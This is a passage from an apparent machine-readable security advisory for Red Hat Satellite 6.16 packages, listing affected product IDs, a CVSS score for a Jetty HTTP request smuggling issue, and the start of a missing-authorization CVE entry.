"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "org.eclipse.jetty/jetty-http: HTTP request smuggling via chunked extension quoted-string parsing"
},
{
"cve": "CVE-2026-12515",
"cwe": {
"id": "CWE-862",
"name": "Missing Authorization"
},
"discovery_date": "2026-06-17T11:37:24.783000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
